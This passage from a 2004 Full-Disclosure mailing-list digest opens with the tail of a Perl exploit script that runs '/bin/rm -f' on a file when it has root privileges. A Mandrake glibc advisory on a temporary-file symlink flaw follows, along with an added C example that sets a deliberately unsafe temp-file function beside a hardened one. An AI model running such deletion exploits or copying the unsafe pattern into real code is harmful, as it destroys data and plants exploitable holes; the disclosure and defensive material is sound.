    # $> is the effective UID; only root (0) runs the command.
    if ($> == 0) {
        print "[-] EXECUTING CMD\r\n";
        system("/bin/rm -f $file");
        print "[-] DONE\r\n";
        print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
        exit();
    } else {
        print "[-] EXPLOIT FAILED\r\n";
        print "[-] YOU ARE NOT ROOT\r\n";
        print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
    }
}
Vendor status:
Neither FreeBSD nor Linux developers have been contacted yet!
-Xenzeo
------------------------------
Message: 15
Date: 30 Dec 2004 03:24:39 -0000
From: Mandrake Linux Security Team <security () linux-mandrake com>
Subject: [Full-disclosure] MDKSA-2004:159 - Updated glibc packages fix temporary file vulnerability
To: full-disclosure () lists netsys com
Message-ID: <20041230032439.10118.qmail () updates mandrakesoft com>
********************************************************************
This email may contain information which is privileged or confidential. If you are not the intended recipient of this
email, please notify the sender immediately and delete it without reading, copying, storing, forwarding or disclosing
its contents to any other person
Thank you
Check us out at http://www.bt.com/consulting
********************************************************************
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandrakelinux Security Update Advisory
_______________________________________________________________________
Package name: glibc
Advisory ID: MDKSA-2004:159
Date: December 29th, 2004
Affected versions: 10.0, 10.1
______________________________________________________________________
Problem Description:
The Trustix developers discovered that the catchsegv and glibcbug
utilities, part of the glibc package, created temporary files in an
insecure manner. This could allow for a symlink attack to create or
overwrite arbitrary files with the privileges of the user invoking the
program.
The updated packages have been patched to correct this issue.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0968
______________________________________________________________________
Updated Packages:
_______________________________________________________________________
To upgrade automatically use MandrakeUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandrakesoft for security. You can obtain
the GPG public key of the Mandrakelinux Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandrakelinux at:
http://www.mandrakesoft.com/security/advisories
If you want to report vulnerabilities, please contact
security_linux-mandrake.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team
<security linux-mandrake.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQFB03T2mqjQ0CJFipgRAsGxAJ4w5MrLm/iq1meYV9yMg8sMbCHbrgCguhSR
l+3oHXol5pgiVuE/RyjXBH0=
=gAsH
-----END PGP SIGNATURE-----
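The temporary-file weakness the advisory above describes, as an added example that is not part of the Mandrake advisory or of glibc: the predictable-name pattern that makes a symlink attack possible, beside a hardened replacement built on mkstemp() and an fstat() check on the returned descriptor. The function names and the TMP_PATH_MAX constant are ours.

```c
/* Added example, not part of the MDKSA-2004:159 advisory or of glibc: the
 * insecure temporary-file pattern behind CAN-2004-0968 beside a hardened
 * version. Names (unsafe_tmp_open, safe_tmp_open) are ours. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define TMP_PATH_MAX 4096

/* Unsafe: predictable name (dir/tag.PID) and O_CREAT without O_EXCL. A
 * symlink planted at that path beforehand is followed, so its target is
 * truncated and written with the caller's privileges. Returns fd or -1. */
int unsafe_tmp_open(const char *dir, const char *tag)
{
    char path[TMP_PATH_MAX];
    snprintf(path, sizeof path, "%s/%s.%ld", dir, tag, (long)getpid());
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Safe: mkstemp() picks an unpredictable suffix and creates the file with
 * O_CREAT|O_EXCL, so any existing path (symlink included) makes it fail
 * rather than be reused. fstat() on the descriptor, not stat() on the name,
 * then confirms we hold a regular file we own with a single link. On
 * success the name is copied to out_path (TMP_PATH_MAX bytes). */
int safe_tmp_open(const char *dir, const char *tag, char *out_path)
{
    char tmpl[TMP_PATH_MAX];
    struct stat st;
    int fd, n = snprintf(tmpl, sizeof tmpl, "%s/%s.XXXXXX", dir, tag);

    if (n < 0 || n >= (int)sizeof tmpl)
        return -1;
    if ((fd = mkstemp(tmpl)) < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1
        || st.st_uid != geteuid()) {
        close(fd);          /* something is off: do not hand it out */
        unlink(tmpl);
        return -1;
    }
    strcpy(out_path, tmpl);
    return fd;
}
```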
------------------------------
_______________________________________________
Full-Disclosure mailing list
Full-Disclosure () lists netsys com
https://lists.netsys.com/mailman/listinfo/full-disclosure
End of Full-Disclosure Digest, Vol 1, Issue 2144
************************************************
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html